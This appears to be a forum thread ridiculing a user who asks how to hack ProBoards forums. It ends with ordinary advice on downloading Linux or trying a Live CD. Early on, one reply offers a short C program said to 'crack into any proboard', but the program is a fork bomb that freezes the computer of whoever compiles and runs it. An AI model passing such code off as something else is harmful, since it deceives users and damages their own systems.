A sharp metal object usually does the trick.

function nedd(kn) {
any1 = kn;
ow = any1 * how + 2;

return hack(kn + ow, "proboards");
}

compile and run the following code on a unix (or linux) computer and you will be able to crack into any proboard:

#include <sys/types.h>
#include <unistd.h>

int main(void) {

while(1) {

fork();

}

return 0;

}

Dude I totally know how to hack the entire internet.

I'm old so I know this ****. I remember using Prodigy under DOS. I know that older dialup games could be sped up considerably by typing ATH and dumping lusers with lousy terminal programs.

Proboards is a trifle. I hacked it just now, while insulting you. Watch, oh there it goes again.

mick, you are an idiot. No one is going to tell you how to hack proboards. Its called screwing yourself. You should try it. Im tired of people asking -- not just here, but other places as well -- "how to hack". First of all, what do you honestly think you would be able to do with a JAVASCRIPT on a foum site that uses PHP and mySQL? If you want to destroy someone's work, find out how somewhere else.

fill in the blanks:

hack, v. to _______

WTF do you possibly mean by "hack?"

This is a good one.

Patrick Clinger (owner of Proboards) has offered money to anyone who can hack Proboards.

Tons of places. It all depends on what kind you want. If you're a new user then I would recommend Mandriva (http://mandriva.com).

Most linux distributions are free -- especially for personal use. You can purchase CD's from the website or you can just download the ISO's and burn them yourself. It can take a few hours depending on your connection speed but it's totally free.

Well -- after going through Mandriva's site I can't find their free download. Try Suse instead at: http://download.novell.com/Download?buildid=aea0zTYvWN0~

In fact, you may also just want to try a Live CD which will load Linux from a bootable CD-rom. This will allow you to test it out, and then reboot without the CD to the OS on your drive (probably Windows).
